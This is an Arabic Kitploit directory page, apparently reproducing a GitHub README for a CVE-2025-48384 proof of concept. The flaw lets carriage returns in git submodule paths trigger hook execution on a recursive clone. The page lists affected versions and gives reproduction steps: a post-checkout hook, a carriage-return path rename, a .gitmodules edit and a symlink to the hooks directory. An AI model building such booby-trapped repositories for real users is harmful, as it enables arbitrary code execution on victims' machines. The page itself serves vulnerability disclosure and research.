Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-48384-poc — إثبات مفهوم لـ CVE-2025-48384 | Kitploit
أدوات/GitHubGitHub/jacobholtz/cve-2025-48384-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالأوراق والأبحاثالتعلم والتعليمتطوير الحمولات
GitHubjacobholtz/cve-2025-48384-poc

CVE-2025-48384-poc

إثبات مفهوم لـ CVE-2025-48384

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-48384-poc

تأخذ CVE-2025-48384 شكل ثغرة في حل الروابط غير الصحيح (اتباع الروابط) في git. على وجه التحديد، يتم تحليل أسماء الملفات التي تحتوي على أحرف إرجاع بشكل غير صحيح في .git/config، وقد يؤدي تضمين رابط رمزي يشير إلى ملف git hook قابل للتنفيذ موجود في وحدة فرعية كدليل hooks للوحدة الفرعية إلى تنفيذ تعليمات برمجية عشوائية عند استنساخ المستودع باستخدام git clone --recursive.

Git لنظام Microsoft Windows لا يتأثر بهذه الثغرة، مما يترك بشكل أساسي إصدارات git محددة على Linux و MacOS عرضة للخطر. الإصدارات المتأثرة هي:

  • v2.50.0
  • v2.49.0
  • v2.48.0-v2.48.1
  • v2.47.0–v2.47.2
  • v2.46.0–v2.46.3
  • v2.45.0-v2.45.3
  • v2.44.0–v2.44.3
  • v2.43.6 والإصدارات الأقدم

خطوات إعادة إنتاج إثبات المفهوم:

  1. قم بإنشاء مستودعين، poc و submodule
  2. في submodule، قم بإنشاء git hook post-checkout لتنفيذ التعليمات البرمجية عند استنساخ مستودع poc بشكل متكرر:
root@kitploit:~
#!/bin/bash
touch ~/hackedlol
  1. في poc، أضف مستودع الوحدة الفرعية باستخدام git submodule add https://github.com/<your submodule repo>.git sub
  • أضف حرف إرجاع إلى المجلد الفرعي الذي تم إنشاؤه حديثًا باستخدام git mv sub $(printf "sub\r")
  • أضف printf "\tpath = \"sub\r\"\n" إلى .gitmodules وقم بإزالة المسار الأصلي.
  • أنشئ رابطًا رمزيًا لمجلد hooks في دليل .git المحلي باستخدام ln -s .git/modules/sub/hooks sub
  • أضف كل شيء إلى المستودع
  • نأمل أن يعمل ههه
  • المصادر

    • https://dgl.cx/2025/07/git-clone-submodule-cve-2025-48384
    • https://github.com/git/git/commit/05e9cd64ee23bbadcea6bcffd6660ed02b8eab89#diff-8fbc2654131392c3018ecfc92462057b3bdc675cc674084c248bb0393a46b59f
    تنزيل الأداة